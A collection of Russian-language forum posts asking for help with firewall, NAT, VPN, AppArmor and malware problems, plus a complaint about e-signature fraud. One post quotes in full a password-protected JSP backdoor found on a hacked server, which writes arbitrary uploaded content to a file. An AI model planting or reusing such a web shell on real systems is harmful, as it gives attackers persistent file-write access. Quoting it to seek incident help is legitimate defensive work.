изучал арч вики и вот не понимаю как сделать https://wiki.archlinux.org/title/Security_(%D0%A0&...)#%D0%9E%D1%82%D0%BA%D1%80%D1%8B%D1%82%D1%8B%D0%B5_%D0%BF%D0%BE%D1%80%D1%82%D1%8B

Там где написано что службу можно привязать к локалхост. Это как то через systemd делается?

Добрый день коллеги,

столкнулся с задачей которую никак не могу решить верно (с помощью одного роутера freebsd).

сеть состоит из 3-х хостов R0, R1, H1. Необходимо обеспечить доступность H1 по обоим ip адресам, пусть для простоты будет tcp 110, при этом строгое условие - H1 должен отправлять пакеты отправителю с того адреса на который получен запрос.

Схематично: https://c.radikal.ru/c33/2112/a8/c337fae01d2f.jpg

R0  (не изменяемая часть)
ip A.A.A.A/24
================================
R1 (em0) (alias делать запрещено)
ip A.A.A.A+1/24
gw A.A.A.A

R1 (em2)
ip A.A.A.A+2/24
gw A.A.A.A

R1 (em1)
ip B.B.B.B/24
=================================
H1 (em0)
ip B.B.B.B+1/24 alias0 ip B.B.B.B+2/24
gw B.B.B.B

Как видно классический PBR и NAT, эта задача решается fwd (next-hop, c подменой mac), давнешний конфиг для этого (nat отдельным демоном) :

ipfw add 1000 divert 8778 ip from B.B.B.B+1 to any
ipfw add 1100 divert 8668 ip from B.B.B.B+2 to any

ipfw add 3000 fwd A.A.A.A log ip from A.A.A.A+1 to any
ipfw add 3100 fwd A.A.A.A ip from A.A.A.A+2 to any

ipfw add 4000 divert 8778 ip from any to A.A.A.A+1
ipfw add 4100 divert 8668 ip from any to A.A.A.A+2

ipfw add 5000 allow ip from any to any

Данный конфиг работает отлично когда внешние шлюзы R1 разные, т.е. A.A.A.A и какой-нибудь С.С.С.С, но в задаче выше шлюз одинаковый (читай mac+ip). Отладка правил показывает, что ipfw корректно работает по правилам, но отправка пакета действием fwd идет по первому попавшемуся соответствию в таблице соответствия mac+ip. Т.е. в случае выше по default-gateway A.A.A.A через интерфейс em0. По em2 tcpdump показывает, что получает пакеты из вне, но отправка ответа идет через em0. При этом хост H1 доступен через em0.

Соответственно вопрос, как в данной задаче обеспечить доступность хоста H1 через оба адреса (интерфейса) и с использованием только одного роутера R1 на базе FreeBSD? Накиньте идей, кручусь возле net.fibs(setfib), но что-то никак.

P.S. повторюсь, неизменяемые условия: R0, настройки R1 в части адресов А.А.А.0/24.

Всем доброго времени суток!

Система Windows X. Проблема с заражением браузера.

Спецом не являюсь так что прошу заранее прощения за отсутствие сленга и "свободное плавание" в вопросе.
При изучении кода браузеров - эдж/хром/мозила обнаружил теги не присущие для сайтов прописаны в теге style, а также ссылки ведущие на всякие непонятные сайты.
при просмотре с других устройств таких паразитов не обнаруживается, потому считаю, что заражено именно моё устройство. Использование MBAM, Kaspersky, DRWeb и прочими не выявляет источник заразы.

Заранее благодарен.

https://www.ft.com/content/c78be2cf-a1a1-40b1-8ab7-904d7095e...

Телепортацией и галограммами меня не удивить, а вот что за новый такой tcp/ip предлагают и в чем его суть, я так понимаю что оно нацелено на танкистов сидящих за натом ? Или я чего-то не так понимаю. Никто не изучал вопрос ?

как там задать priority строку идентификации?

Всем привет! Запустил iftop и заметил возникающие странные домены в выводе:
affirm.777777.gko
loaves.555444.rtx
vinson.8221112222.uoo
Что это может быть?

Добрый день всем.
Прошу помощи в настройке ipf и natd.
есть такие настройки

FreeBSD GW01 9.3-RELEASE-p42 FreeBSD 9.3-RELEASE-p42

fwcmd="/sbin/ipfw -q add"
nat="/sbin/natd -f /etc/natd.conf"
intIf="em0" #локальная сеть
extIf="em1" #Внешний мир
extIP2="IP2"
intIP1="IP1"
intIP1="IPo1"

$nat -p 8666 log -s -m -redirect_port tcp $IPo1:7654 7654 -a $extIP2
$fwcmd 1746 divert 8666 log tcp from any to $extIP2 7654 in via $extIf
$fwcmd 1746 divert 8666 log tcp from $IPo1 7654 to any out via $extIf

суть какая. при коннекте из внешнего мира на $extIP2 на порт 7654 пробрасывает на $IPo1:7654.
С этим вроде бы хорошо. Но необходимо чтобы была подмена $extIP2 на адрес $intIf
и что то с этим никак. если в строке NAt заменить -а $extIP2 на -а $intIf то перестает все работать.
можно ли такое сделать?

tails в virtualbox не запустился с флешки виртуальной.
fatal: could not read from the boot medium. system halted.

Приветствую форумчане!
Прошу помощи в FreeBsd есть довольно много вопросов касательно Ipfw.
1. Нужно ли пересобрать ядро в FreeBSD 13 чтобы включить поддержку ipfw?
В 9 версии пересобрал  с такими параметрами:
# ipfw
options IPFIREWALL
options IPFIREWALL_NAT
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10
options LIBALIAS
options DUMMYNET
options ROUTETABLES=2

Нужно ли сейчас так заморачиваться?

2. Верно ли я понимаю  при параметре options IPFIREWALL_NAT, Nat работает ядерно, а при options DIVERT работает  через демон Natd?

3. Нужно ли включать  в ядре options LIBALIAS при ядерном нате на FreeBsd 13?

4. Если у кого то  есть  пример правил  с сетью  DMZ скиньте пожалуйста не совсем понимаю  реализацию  в плане правил.
Спасибо.

Все привет! Помогите, пожалуйста, с профилем для AppArmor
Вот профиль:

# Last Modified: Mon May  3 21:05:19 2021
#include <tunables/global>

/usr/bin/FBReader flags=(complain) {
  #include <abstractions/base>
  #include <abstractions/fonts>
  #include <abstractions/gnome>
  #include <abstractions/openssl>
  #include <abstractions/private-files>
  #include <abstractions/private-files-strict>
  #include <abstractions/ssl_certs>
  #include <abstractions/user-tmp>

  deny network,
  deny network inet,
  deny network inet6,
  deny network raw,

  / r,
  /** r,
  /usr/bin/FBReader m,
  /usr/share/** k,
  owner /home/*/** rk,
  owner /home/*/.FBReader/** rw,
  owner /proc/*/cmdline r,

}

Выход в сеть по-прежнему работает

Добрый день. Пожалуйста, не кидайтесь тапками в нуба, ибо опыта работы в данной сфере 0. Нужна Ваша профессиональная помощь!

Дано: небольшой медицинский кабинет, несколько устройств, подключенных к сети:
1. Компьютер врача
2. Компьютер администратора
3. Телефон врача
4. Телефон администратора
5. Принтер wi/fi
6. Телевизор смарт-тв
7. Несколько камер наблюдения
Проблема: сеть защищена только паролем от вайфай, все устройства подключены к одной общедоступной сети. т.е к какой сети подключены вышеперчисленные устройства, к той же сети подключаются паиенты и сотрудники. В любой момент могут подключиться к принтеру и пустить печать бранных слов, или, чт еще хуже, получить доступ к файлам клиентов (информация, заключения и тд). Так же проблема состоит в сотрудниках,точнеее в социальных сетях (фейсбук/инстаграм), в которых они любят сидеть, очень часто в рабочее время с пациентами.
Так же в ближайшем будущем хотели бы организовать свой небольшой сервер для хранения медицинской документации (отказаться от облачных решений), необходимо еще думать об этом.

Собственно, вопрос - как защитить "корпоративные" устройства от взлома, заблокировать доступ к фейсбуку/инстаграму, при этом что бы была возможность организовать сервер?

Буду рад за любую помощь. Не прошу сделать за себя, прошу лишь объяснить как это все можно сделать? Заранее извиняюсь, что мог поместить вопрос не в тот раздел.

Приходил сисадмин и у нас опять ничего не работает. Да у него rwrwrw на башке :)
Кому знакомо?

Всем привет форумчане! Хочу посоветовать отличный каталог статей: https://codeby.net/threads/ehtichnyj-xaking-testirovanie-na-.../ , на тему этичного хакинга, в нем вы сможете найти много полезной информации, не только статьи на определенную тему, но и новости, а также переводы с других языков на тему пентестинга, думаю данная информация окажется полезной, особенно начинающим в области ИБ.

В один прекрасный день, в один прекрасный момент интернет отключился (частично вроде, так как подключаться к серваку в игре начал, но остальные сайты не открывал).

Когда вводил адрес какого-либо сайта - грузилось это:

https://i.imgur.com/1RJvzGU.jpg

ASUS Wireless Router RT-N11P

В подключениях была "Сеть 4", хотя раньше была "Неопознанная сеть":

https://i.imgur.com/GQnzSYz.jpg

Что это такое?

Провайдер ТТК. PPPoE.

Напрямую через кабель подключен, роутер не юзаю (никаких асусов у меня нет и не было).

Вроде бы простой вопрос, но на лоре затруднились с ответом.
Цитирую свой вопрос сюда:

Для того, чтобы ограничить доступ к серверу со всех IP-адресов, кроме одного,  добавляю в строку конфига /etc/ufw/user.rules

-A ufw-user-input -p tcp --dport 22  -j ACCEPT

параметр -s 85.85.85.85 и она стает такой:

-A ufw-user-input -p tcp --dport 22 -s 85.85.85.85 -j ACCEPT

Пока сервер пускает со всех адресов.
Но когда делаю полный ребут сервера, то ура! - пускает только с 85.85.85.85

Но полный ребут не совсем гут, лучше перезапустить только файрвол ufw,
и для этого у него вроде как предсмотрена команда reload, о которой ман говорит так:

    reload - перезагрузить файервол;

Хорошо, перезагружаю. Но вместо ожидаемого результата из конфига выбрасывается -s 85.85.85.85 и брюки снова превращаются в свой прежний вид:

-A ufw-user-input -p tcp --dport 22  -j ACCEPT

Для чего вообще тогда этот непонятный reload, что он на самом деле делает?

Я любитель скачивать кряки с интернета.... В первый раз так жутко не повезло. Бэкапов никаких нет...
Установил photoshop(заметил, что python установился, но не понял и забил). Вечером заметил, что страницы стали грузится дольше. Решил зайти в диспетчер задач, увидел там процесс с python и tor. Изучил всё это дело и похоже python анонимно, что то отправлял. Программу tor нашёл на гитхабе - tor ip changer (https://github.com/ianxtianxt/tor-ip-changer) в торе я не шарю и это мне никого значения не дало. По python - запускалась прога через планировщик заданий. Все проги скину на диск и отправлю отдельным сообщением.
Вирусню удалил, планировщик почистил,но хром выдал ошибку ERR_PROXY_CONNECTION_FAILED.
после по гайдам настройки прокси в стандарт перевёл, реестр почистил, автозагрузку тоже, переустанавливал несколько раз Chrome, но так он и не заработал. Другие бразузеры, после того как я в свойствах браузера сбросил к стандарту в вкладке дополнительно. Сколько я гуглил, ничего не нашёл. Подскажите пожалуйста, что ещё можно попробовать сделать, чтоб заработало?

1) hblock - https://github.com/hectorm/hblock

Не останавливает флеш-рекламу, при просмотре ютуба вылезает куча рекламы.

2) AdBlock на роутере - я не пользуюсь роутером (прямое соединение), поэтому этот способ для меня не подходит.

Есть еще какие-либо варианты?

Спасибо.

Помогите разобраться.

Реализован впн с аутентификацией через freeraвius 3, с хранением данных в mysql.

Ожидаю в таблице radacct атрибут Calling-Station-Id видеть ип адрес клиентской машины в сети интернет, но записываются данные "2.18". Подскажите, куда посмотреть в радиус или pptpd, чтобы понять почему ip адрес не передается в БД, как этот параметр передается с pptpd в radius. Как настроить запрос sql, чтобы брался именно ип адрес,а не непонятные данные "2.18"?

Спасибо!

Шлюз на Debian 7.11 (3.2.0-4-686-pae), iptables v1.4.14.

ip внешнего интерфейса: 1.1.1.1

ip внутреннего интерфейса: 192.168.1.1

Внутри локальной сети работает ftp-сервер, для которого нужно организовать доступ снаружи.

ip ftp-сервера во внутренней сети: 192.168.1.55

Порт ftp-сервера во внутренней сети: 51

Вывод lsmod | grep ftp

nf_nat_ftp             12420  0
nf_conntrack_ftp       12533  2 nf_nat_ftp
nf_nat                 17913  2 iptable_nat,nf_nat_ftp
nf_conntrack           43121  9 nf_conntrack_ipv4,nf_nat,iptable_nat,xt_conntrack,xt_state,nf_conntrack_ftp,nf_nat_ftp,xt_CT,nf_conntrack_netlink

Вот так не работает:

iptables -t raw -A PREROUTING --dst 1.1.1.1   -p tcp --dport 55555 -j CT --helper ftp
iptables -t nat -A PREROUTING -i ext --dst 1.1.1.1 -p tcp --dport 55555 -j DNAT --to-destination 192.168.1.55:51

Управляющее соединение открывается, но соединение для потока данных нет.
conntrack -E expect ничего не показывает.

Если переделать, чтобы порт ftp-сервер был стандартным (настройки ftp-сервера и настройки iptables), то все работает:

iptables -t nat -A PREROUTING -i ext --dst 1.1.1.1 -p tcp --dport 55555 -j DNAT --to-destination 192.168.1.55:21

Подскажите пожалуйста какие нужны настройки, чтобы сделать доступным ftp-сервер, работающий на нестандартном порту?

Я хочу соединить два облака по IPsec. Для этой цели созданы по две виртуальной машины в каждом с внешними IP-адресом. Сам IPsec настроил, пинги идут между двумя точками IPsec-машин если указывать внутренние адреса. Но не могу настроить маршрутизацию на другие виртуальные машины из той же подсети. Машина с IPsec находится в той же подсети, что и остальные. Сетевой адаптер один на каждой ВМ. Нужно ли добавлять ещё один для настройки маршрутизации? ОС Ubuntu 20.04, strongSwan версии U5.8.2, ставил командой apt-get install strongswan. В sysctl указал net.ipv4.ip_forward = 1, добавил маршрут 10.132.0.0/20 via 10.129.0.254 dev eth0, файерволл выключен. Конфиг ipsec.conf с одной стороны:

config setup
        charondebug="all"
        uniqueids=yes
conn test
        ikelifetime=600m
        keylife=180m
        rekeymargin=3m
        keyingtries=3
        keyexchange=ikev2
        mobike=no
        ike=aes256gcm16-sha512-modp4096
        esp=aes256gcm16-sha512-modp8192
        authby=psk
        left="10.129.0.254"
        leftid="1.2.3.4"
        leftsubnet=10.129.0.0/24
        leftauth=psk
        right="4.3.2.1"
        rightid="4.3.2.1"
        rightsubnet=10.132.0.0/20
        rightauth=psk
        type=tunnel
        auto=start
        dpdaction=restart
        closeaction=restart

С другой стороны аналогично. Помогите, пожалуйста, настроить маршрутизацию, чтобы подсети видели друг-друга.

Здравсвуйте!
Подскажите. Есть машина. На ней у меня есть локальный администратор. Могу ли я с правами лок адм одной машины назначить лок адм другой по сети??😓😓😞
Помогите плз

Зашел в консоль, а там 4 админа в аккаунтах, по каталогам полазил, есть новые файлы. Наружу админка закрыта, походу по уязвимостям хакнули. Нашел разные файлы, вот один из них
<%
    if("toe0Kq".equals(request.getParameter("pwd")))
    {
        String strCode=request.getParameter("code");
        String strFile=request.getParameter("file");
        if(strCode!=null&&strFile!=null)
        {
            java.io.InputStream in = new java.io.ByteArrayInputStream(strCode.getBytes());
            byte[] b = new byte[1024];
            java.io.ByteArrayOutputStream bs = new java.io.ByteArrayOutputStream();
            int a = -1;
            while ((a = in.read(b)) != -1)
            {
                bs.write(b, 0, a);
            }
            new java.io.FileOutputStream(application.getRealPath("/")+"/img/"+strFile).write(bs.toByteArray());
        }
        out.print("XkaGrVj9");
    }
%>

Посмотрите интервью Майклом Тэлэном по ссылке на ютубе:

https://youtu.be/VVcYBpFR58Y

Есть 2 машины. На 1-й крутится игровой сервер, а 2 будет выступать в качестве моста. Необходимо сделать так, чтобы трафик на 1-ю машину шел через 2-ю с сохранением анонимности(подменой) IP:PORT'а у 1-й.

Пытался сделать что-то наподобие этого, но оказалось безуспешно(Заменил на: 1.1.1.1 - это IP 1-й машины, 2.2.2.2 - это IP 2-й машины):

iptables -t nat -A PREROUTING -p tcp -d 2.2.2.2 --dport 255 -j DNAT --to-destination 1.1.1.1:256
iptables -t nat -A POSTROUTING -p tcp --dst 1.1.1.1 --dport 256 -j SNAT --to-source 2.2.2.2
iptables -A FORWARD -d 1.1.1.1 -p tcp --dport 256 -j ACCEPT

http://www.consultant.ru/document/cons_doc_LAW_122455/

ПРАВИТЕЛЬСТВО РОССИЙСКОЙ ФЕДЕРАЦИИ ПОСТАНОВЛЕНИЕ от 28 ноября 2011 г. N 977

О ФЕДЕРАЛЬНОЙ ГОСУДАРСТВЕННОЙ ИНФОРМАЦИОННОЙ СИСТЕМЕ "ЕДИНАЯ СИСТЕМА ИДЕНТИФИКАЦИИ И АУТЕНТИФИКАЦИИ В ИНФРАСТРУКТУРЕ, ОБЕСПЕЧИВАЮЩЕЙ ИНФОРМАЦИОННО-ТЕХНОЛОГИЧЕСКОЕ ВЗАИМОДЕЙСТВИЕ ИНФОРМАЦИОННЫХ СИСТЕМ, ИСПОЛЬЗУЕМЫХ ДЛЯ ПРЕДОСТАВЛЕНИЯ ГОСУДАРСТВЕННЫХ И МУНИЦИПАЛЬНЫХ УСЛУГ В ЭЛЕКТРОННОЙ ФОРМЕ"

"7(1). ... прошедшим в указанной системе процедуру регистрации, осуществление которой сопровождалось предъявлением основного документа, удостоверяющего личность, и внесением информации о таком способе установления личности в соответствующий регистр этой системы.
При этом документ, удостоверяющий личность, считается предъявленным в том числе при обращении за получением государственной (муниципальной) услуги, предусматривающей личное присутствие заявителя на любом из этапов получения такой услуги."

Что значит считаеца предъявленным? Много где требуется предъявление паспорта. Паспорт предъявляется, чтобы войти в здание, получить судебный документ, на личном приеме в прокурора, в некоторых случаях в МВД, но я при этом не желаю, чтобы меня регистрировали в "ЕДИНАЯ СИСТЕМА ИДЕНТИФИКАЦИИ И АУТЕНТИФИКАЦИИ", хотя судебные приставы (охрана здания) имеют право посмотреть ваши долги и нахождение в уголовном розыске во время вашего пребывания в здании.

Федеральный закон "Об электронной подписи" от 06.04.2011 N 63-ФЗ

http://www.consultant.ru/document/cons_doc_LAW_112701/

http://www.consultant.ru/document/cons_doc_LAW_112701/8431d1...

"Статья 18. Выдача квалифицированного сертификата

1. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр обязан:

1) в порядке, установленном настоящим Федеральным законом, идентифицировать заявителя - физическое лицо, обратившееся к нему за получением квалифицированного сертификата. Идентификация заявителя проводится при его личном присутствии или посредством идентификации заявителя без его личного присутствия с использованием квалифицированной электронной подписи при наличии действующего квалифицированного сертификата либо посредством идентификации заявителя - гражданина Российской Федерации с применением информационных технологий без его личного присутствия путем предоставления информации, указанной в документе, удостоверяющем личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащем электронный носитель информации с записанными на нем персональными данными владельца паспорта, включая биометрические персональные данные, или путем предоставления сведений из единой системы идентификации и аутентификации и единой биометрической системы
.......
а) в отношении физического лица - фамилия, имя, а также отчество (при наличии), дата рождения, реквизиты документа, удостоверяющего личность, идентификационный номер налогоплательщика, страховой номер индивидуального лицевого счета гражданина в системе обязательного пенсионного страхования;"

Это подстава со стороны  Путина и Единой России. При выдичи Паспорта, ИНН, СНИЛС более 10 лет назад с помощью их копий, удаленно, без личного присутствия невозможно было лишится собственности и недвижимости (не считая подделки нотариальных документов и крыминала со стороны нотариуса) следовательно в банковских ячейках документы не хранились, личные дома с сейфами далеко не у всех есть и всем работодателям сведения с этих документов предоставлялись... А теперь по этим данным, крыминальный работодатель может лишить вас собственности!!!

"5. При выдаче квалифицированного сертификата аккредитованный удостоверяющий центр направляет в единую систему идентификации и аутентификации сведения о лице, получившем квалифицированный сертификат"

Где взять ссылку на регистр публичных ключей РФ? Хочу сделать:

#!/bin/sh
wget -O keys_list https://esia.gosuslugi.ru/где_взять_прямую_ссылку???
grep "Вася Пупкин" keys_list
if [ $? -eq 0 ]; then beep; mail ...; exit 1; fi
exit 0

Данный регистр должен быть бесплатен и общедоступные через Интернет:
http://www.consultant.ru/document/cons_doc_LAW_112701/03690e...

Статья 15. Аккредитованный удостоверяющий центр
3. Аккредитованный удостоверяющий центр обязан обеспечить любому лицу безвозмездный доступ с использованием информационно-телекоммуникационных сетей, в том числе сети "Интернет", к реестру квалифицированных сертификатов этого аккредитованного удостоверяющего центра в любое время в течение срока деятельности этого удостоверяющего центра, если иное не установлено федеральными законами или принимаемыми в соответствии с ними нормативными правовыми актами.

Я нахожусь за границей. В ноябре у меня отжали две квартиры 3к и 2к в Москве с помощью поддельной электронно-цифровой подписи. Кроме того, у меня взломали аккаунт на госуслугах.

У меня никогда не было ЭЦП и я даже не знаю, что это такое. Паспорта со мной, я их не терял.

Адвокаты требуют предоплату 250 тыс+5% от стоимости возвращенного имущества (а это 1 миллион р).
У меня таких денег нет. Плюс, неизвестно, сколько ЭЦП на моё имя мошенники выпустили. Я отменю одну, а может, у них 10.

Что делать?

Всем привет.

НИ КОГО НЕ ОБВИНЯЮ! ДЕЛЮСЬ СВОИМИ МЫСЛЯМИ!

Читая новости, зацепился за парочку, которые, по моему мнению, "странно" перекликаются друг с другом:

1) https://servernews.ru/1027691

"Новый драйвер Intel RFIM подстраивает частоты DDR и IVR, чтобы избавиться от радиопомех для Wi-Fi/5G

В Linux 5.11 ожидается немало новых функций. И одной из них станет драйвер RFIM (Radio Frequency Interference Mitigation) от компании Intel. Он настраивает частоту работы оперативной памяти и интегрированного стабилизатора напряжения (Fully Integrated Voltage Regulator, FIVR) так, чтобы не создавать помехи для сетей Wi-Fi/5G..

2) https://www.opennet.dev/opennews/art.shtml?num=54262

"Техника скрытой передачи данных через генерацию чипами памяти сигнала, улавливаемого по Wi-Fi

Исследователи из Университета имени Давида Бен-Гуриона (Израиль), занимающиеся изучением скрытых методов передачи данных с изолированных компьютеров, разработали новый метод организации канала связи - AIR-FI, позволяющий через манипуляции с чипами оперативной памяти DDR генерировать радиосигнал на частоте 2.4 GHz, который можно уловить любым устройством с поддержкой Wi-Fi на расстоянии в несколько метров."

И вспомнилась мне одна история:
https://www.opennet.dev/opennews/art.shtml?num=28998

"ФБР заподозрили в помещении бэкдора в IPSEC-стек OpenBSD (дополнено)

Тэо де Раадт (Theo de Raadt), лидер проекта OpenBSD, опубликовал в списке рассылки тревожное сообщение, в котором опубликовал письмо, свидетельствующее о том, что некоторые разработчики проекта, принимавшие участие в разработке IPSEC-стека OpenBSD на ранней стадии его развития, приняли от правительства США денежное вознаграждение за интеграцию в IPSEC-стек кода бэкдора. "

Чего-то не пойму, это баг или фича? ^_^ (народная шутка)

Есть мысли? Делитесь...

Ну, а я считаю, что Intel превентивно закрывает уязвимость...

Интересует наиболее полный список гугловых сетей. Иногда совершенно неожиданные появляются такие, которых у меня нет в списках. Хотелось бы забанить максимально надежно. Может быть кто-то уже составляет такие списки ?

Спасибо.

Случайно возникла где дискуссия на тему: где надежнее защищен веб-сервер - в  Интернете или в Локалке?

Обычно веб-сервер выставляется прямо в Интернет по белому адресу, и тогда он подвержен всем видам атак на него.
Одной из защит веб-сервера от этих атак является файрволл операционной системы, которым закрываются неиспользуемые порты.

Но также можно установить веб-сервер в локалке и давать к нему доступ из Интернета через NAT аппаратного роутера, которым тоже закрываются неспользуемые порты.

Раньше мне всегда казалось, что веб-сервер в локалке ^в принципе^ гораздо более надежно защищен от внешних посягательств и имеет более высокую взломоустойчивость.
Однако после возникшей дискуссии возникли сомнения, так ли это.

Надеюсь, что знатоки по безопасности развеют эти сомнения.

PS. Разумееется, для корректности сравнения защищенности этих вариантов будем считать, что файрвол операционной системы и файрвол роутера одинаковы по своим защитным свойствам.

Наблюдается рандомное падение новых процессов всех пользователей.

Тестовая экспериментальная система, все всегда работало хорошо. По рекомендации: https://sourceforge.net/p/linux-ima/wiki/Home/#audit-log-all... сделал:

  echo 'audit func=BPRM_CHECK mask=MAY_EXEC' >> /sys/kernel/security/ima/policy
  echo 'audit func=MMAP_CHECK mask=MAY_EXEC' >> /sys/kernel/security/ima/policy

Система ночью много лопатила, забила 100% диск, а потом syslog заполнил 100% всю память и своп.

Почистил диск и память, а падение процессов продолжается равномерно на всех ядрах процессора с ошибкой Not tainted:

PAX: refcount overflow detected in: *
....
Code: 01 4a ... 86 01 <83> c0 01 ... ba 2c - всегда один и тот же.

Может виря подцепил?